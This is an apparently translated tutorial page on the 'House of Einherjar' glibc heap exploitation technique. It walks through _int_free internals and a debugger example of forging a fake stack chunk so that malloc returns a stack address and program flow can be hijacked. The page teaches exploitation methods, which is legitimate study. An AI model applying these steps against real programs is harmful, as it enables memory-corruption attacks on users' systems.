Excuse the ads! We need some help to keep our site up.
House of einherjar
- House of einherjar is a technique that exploits the process of _int_free () registering chunks with top chunks.
_int_free () checks if the pointer passed is a chunk to be included in fastbin.
And if the chunk is not fastbin, check if it is a chunk obtained by mmap().
- And if the chunk is not the chunk obtained by mmap(), then make sure the arena is locked.
- If Arena is not locked, lock it.
- _int_free () checks whether the passed pointer and the arena top have the same value.
- It then checks whether the next chunk is beyond the bounds of the arena and whether the next chunk is not actually used.
- Then check if the chunk size is smaller than the minimum size and larger than the value of Arena's system_mem.
- This verifies that the size of the next chunk is normal.
_int_free () checks to see if the chunk's "size" has the PREV_INUSE flag set.
- If the bit of the flag is set, the "size" of the chunk plus "prev_size" is stored in the "size" variable.
- Then call chunk_at_offset () to return a pointer minus prev_size from that chunk's pointer, which is stored in the variable p.
- Then call unlink () to remove the chunk from the empty list.
- And _int_free () checks if the next chunk is the top chunk.
- If the next chunk is a top chunk, the size of the next chunk is added to the size variable.
- Set the PREV_INUSE flag to the value of the variable.
- Then pass the variable size and the variable p to set_head () to set the chunk's header.
- And store the variable p on top of arena.
- House of einherjar can be implemented if you can write fake chunks in memory and change the headers of in-use chunks.
Write a fake free chunk on the stack and allocate 2 memory of size not corresponding to fast bins.
- Change the values of the header of the chunk that was allocated last.
- Remove the PREV_INUSE flag from the value of size.
- Save the chunk's header address minus the address of the chunk to "prev_size".
- Fake chunks should have the following values.
- Store the same size in "prev_size" as the last chunk allocated.
- Save the subtracted address of the chunk header from the last allocated chunk to "size" and save the address of the fake chunk to fd, bk.
- When the last chunk is released, the fake chunk's address is stored at arena->top.
- Requesting memory allocation returns a pointer to the area of the fake chunk.
- For example, allocate memory of size 0x70, 0xf0 and write a fake chunk on the stack.
- Store 0x100 in the fake chunk's prev_size, and save it in "size" after subtracting the fake chunk's address(0x7fffffffe430) from the chunk's address(0x602080).
- Remove the PREV_INUSE flag from the value of the chunk's size to free and save the value of the fake chunk's size to prev_size.
- And when free that chunk, the fake chunk becomes a Top chunk.
- And when request memory allocation, you are allocated a realm of fake chunk.
- The code is the code described in the previous example.
- Create a fake chunk on the stack and request an allocation of memory of size 0x70, 0xf0.
- Change the value of the header of the chunk that was allocated last, and release the chunk.
- Request a new memory allocation and save the data in that area.
- Fake chunks and the value of the header of the chunk to be released are checks at 0x4007a7.
- Also, check the top chunk changes before and after the chunk is freed.
- Check at 0x4007cb that the allocated area is available.
- The address of the chunk to free is 0x602090.
The PREV_INUSE flag has been removed from the chunk's "size" value.
The value of prev_size is 0xffff800000603c50, which is the header address (0x602080) of the chunk to be released minus the address of the fake chunk (0x7fffffffe430).
- The value of prev_size of the fake chunk is 0x100, and the value of size is the same as the value of the prev_size of the chunk to be freed.
- Before free() was called, the top chunk was 0x602180, and after the call, 0x7fffffffe430 became the top chunk.
- When the allocator receives a request to allocate memory, it allocates an area of the fake chunk and returns a pointer (0x7fffffffe440).
- Enter 16 characters 'A' in the area, the entered values will be saved normally.
- In this example, you entered a small number of characters, but you can enter more values, which can also change the flow of the program.